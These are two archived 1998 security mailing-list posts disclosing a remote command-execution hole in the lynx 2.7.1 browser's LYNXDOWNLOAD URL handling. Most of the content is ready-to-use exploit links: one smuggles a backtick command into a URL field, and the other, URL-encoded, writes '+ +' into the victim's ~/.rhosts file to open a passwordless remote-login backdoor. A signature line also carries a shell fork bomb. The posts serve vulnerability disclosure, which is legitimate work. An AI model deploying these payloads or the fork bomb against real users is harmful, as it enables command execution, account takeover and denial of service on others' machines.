[ http://www.rootshell.com/ ]

Date:         Tue, 17 Mar 1998 16:27:29 +0100
From:         Michal Zalewski <lcamtuf@BOSS.STASZIC.WAW.PL>
Subject:      Very, very ugly remote lynx 2.7.1 hole

While poking around lynx protocol handling routines, I found this very
big, ugly remote hole:

<a href="LYNXDOWNLOAD://Method=-1/File=`touch%20UGLY_BUG`/SugFile=test">
CLICK HERE
</a>

It allows remote execution of any code on viewer's machine. Also, by
setting 'Method' field to 0 or more, you may crash lynx, but it isn't so
exciting as above URL. Also, it's possible to parse /dev/zero as 'File',
also not funny.

Greetings,
_______________________________________________________________________
Michal Zalewski [tel 9690] | finger 4 PGP [lcamtuf@boss.staszic.waw.pl]
Iterowac jest rzecza ludzka, wykonywac rekursywnie - boska [P. Deustch]
=--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=

Date: Tue, 17 Mar 1998 17:56:56 +0100 (CET)
From: Michal Zalewski <lcamtuf@boss.staszic.waw.pl>
To: info@rootshell.com, crv@oliver.efri.hr
Subject: lynx remote command execution


Following href exploits lynx remote hole. It executes
"echo + +>~/.rhosts":

<a 
href="LYNXDOWNLOAD://Method=-1/File=/dev/null%65%63%68%6f%20%2b%20%2b%3e%7e%2f%
2e%72%68%6f%73%74%73%0a/SugFile=test">
CLICK HERE</a>

More details about vunerability at BUGTRAQ (coming soon ;).